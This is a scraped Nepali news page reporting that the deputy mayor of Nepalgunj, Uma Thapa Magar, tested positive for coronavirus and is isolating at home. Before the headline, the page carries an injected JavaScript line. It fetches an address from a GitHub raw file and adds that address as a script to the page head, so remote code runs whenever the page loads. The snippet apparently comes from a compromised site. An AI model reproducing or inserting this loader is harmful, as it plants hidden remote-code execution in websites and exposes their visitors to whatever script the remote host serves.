;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपालगन्जकी उपमेयर थापालाई काेराेना संक्रमण – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपालगन्जकी उपमेयर थापालाई काेराेना संक्रमण
समाचार

नेपालगन्जकी उपमेयर थापालाई काेराेना संक्रमण

असोज २७,

बाँके । नेपालगन्ज उपमहानगरपालिकाका उपमेयर उमा थापामगरलाई कोरोना भाइरस संक्रमण पुष्टि भएको छ ।
भेरी अस्पतालको प्रयोगशालामा गरिएको कोरोना परिक्षणमा मंगलबार आएको नतिजामा आफुलाई कोरोना संक्रमण देखिएको उपमेयर थापामगरले जानकारी दिए ।

‘२०–२५ दिन पहिलेदेखि रुघाखोकी लाग्ने र घाँटी दुखिरहेको थियो, बिचमा २ पटक जाँच गराएँ नतिजा नेगेटिभ आएको थियो’ उनले भनिन्- तर रुघाखोकी निको नभएपछि डाक्टरको सल्लाह अनुसार आईतबार पुनः स्वाब दिएको र आज मंगलबार आएको नतिजामा आफुलाई कोरोना संक्रमण देखिएको छ ।

उपमेयर थापामगरले आफू स्वास्थ्य सुरक्षाका मापदण्ड अपनाउँदै होम आइसोलेसन मै बसेको बताइन् ।
उपमेयर थापामगर बाँकेमा शुरु देखि नै भारतबाट नेपाल भित्रिएका नागरिकको व्यवस्थापनका साथै कोरोना रोकथाम तथा नियन्त्रणमा अग्रभागमा खटिएर काम गर्दै आएकी छन्।

फेसबुक प्रतिक्रियाहरु